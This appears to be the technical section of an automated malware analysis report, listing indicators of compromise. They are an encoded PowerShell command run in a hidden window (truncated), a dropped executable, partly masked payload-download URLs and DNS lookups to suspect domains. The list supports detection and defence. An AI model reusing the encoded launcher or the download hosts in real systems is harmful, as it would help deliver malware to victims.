Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASwBqAGUAdABmAGoAdwB6AGoAaQBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFoAaABrAGoAagBhAHoAbwBmAGoAcQAgACMAPgAgACQAQQBuAHEAbwBoAGIAbwBkAGgAPQAnAEwAZg...
- %HOMEPATH%\332.exe
- %HOMEPATH%\332.exe
- http://ep###etwork.cf/wp-includes/87548/
- http://ne#.#adar.kz/wp-includes/j154/
- DNS ASK ar###ore.com.vn
- DNS ASK ep###etwork.cf
- DNS ASK sr######kshmiborewell.in
- DNS ASK pe###trade.hu
- DNS ASK ne#.#adar.kz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASwBqAGUAdABmAGoAdwB6AGoAaQBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFoAaABrAGoAagBhAHoAbwBmAGoAcQAgACMAPgAgACQAQQBuAHEAbwBoAGIAbwBkAGgAPQAnAEwAZg...' (with hidden window)